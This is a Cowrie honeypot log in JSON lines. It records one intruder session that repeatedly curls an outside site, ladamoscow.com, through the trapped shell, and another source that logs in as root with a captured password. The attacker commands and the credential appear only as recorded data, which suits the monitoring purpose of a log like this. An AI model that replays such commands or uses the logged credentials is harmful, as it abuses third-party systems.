{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.103671Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.145353Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.146318Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.184114Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.185960Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.225332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.226320Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.273971Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.275034Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.314988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.315932Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.352792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.353774Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.390311Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.391233Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.427765Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.428690Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.464985Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.465886Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.505468Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.506523Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.544027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.544969Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.582354Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.583449Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.620951Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.622287Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.659810Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.660871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.701051Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.701879Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.739599Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.740797Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.779635Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.780637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.821628Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.822578Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.859520Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.860571Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.897909Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.899247Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"223.197.186.7","src_port":31469,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0dfc1ef4d4f","protocol":"ssh","message":"New connection: 223.197.186.7:31469 (1.2.3.4:22) [session: b0dfc1ef4d4f]","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.917346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.919242Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.938502Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.939439Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.977022Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.978014Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.058506Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.059983Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.096879Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.097861Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.137890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.138914Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.177929Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.178992Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.180564Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.216370Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.217361Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.256065Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.257108Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.305864Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.306955Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.343764Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.344740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.384804Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.386130Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.427438Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.428372Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.465816Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.466829Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.504785Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.507082Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.545856Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.546953Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.584511Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.585661Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.623853Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.625057Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.663145Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.664084Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.702968Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.704018Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.743124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.744163Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.786736Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.787884Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.826350Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.827309Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.867808Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.868850Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.907297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.908336Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:05.958592Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:05.959626Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.002705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.003944Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.043501Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.044627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.086406Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.088097Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.127176Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.128480Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.167570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.168609Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.207951Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.209230Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.success","username":"root","password":"syhhidc","message":"login attempt [root/syhhidc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.215088Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.247107Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.248179Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.289681Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.291084Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.328146Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.329199Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.369241Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.370364Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.413297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.414638Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.455102Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.456193Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.495443Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.496500Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.533823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
